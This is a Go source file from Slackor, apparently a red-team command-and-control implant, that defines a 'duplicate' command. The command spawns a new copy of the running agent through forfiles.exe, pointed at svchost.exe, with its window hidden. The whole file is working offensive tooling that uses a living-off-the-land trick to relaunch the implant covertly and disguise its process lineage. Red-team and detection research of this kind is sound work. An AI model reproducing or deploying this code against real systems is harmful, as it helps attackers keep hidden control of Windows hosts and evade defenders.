github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/pkg/windows/duplicate.go (about) 1 // +build windows 2 3 package windows 4 5 import ( 6 "bytes" 7 "fmt" 8 "os" 9 "os/exec" 10 "syscall" 11 12 "github.com/Coalfire-Research/Slackor/pkg/command" 13 ) 14 15 // Duplicate spawns a new agent using forfiles.exe 16 type Duplicate struct{} 17 18 // Name is the name of the command 19 func (d Duplicate) Name() string { 20 return "duplicate" 21 } 22 23 // Run spawns a new agent using forfiles.exe 24 func (d Duplicate) Run(clientID string, jobID string, args []string) (string, error) { 25 cmdName := "forfiles.exe" 26 cmd := exec.Command(cmdName) 27 cmdArgs := []string{"/p", `c:\windows\system32`, "/m", "svchost.exe", "/c", os.Args[0]} 28 cmd = exec.Command(cmdName, cmdArgs...) 29 var out bytes.Buffer 30 var stderr bytes.Buffer 31 cmd.Stdout = &out 32 cmd.Stderr = &stderr 33 cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 34 err := cmd.Run() 35 if err != nil { 36 return "", err 37 } 38 return fmt.Sprintf("Duplicated %s.", os.Args[0]), nil 39 } 40 41 func init() { 42 command.RegisterCommand(Duplicate{}) 43 }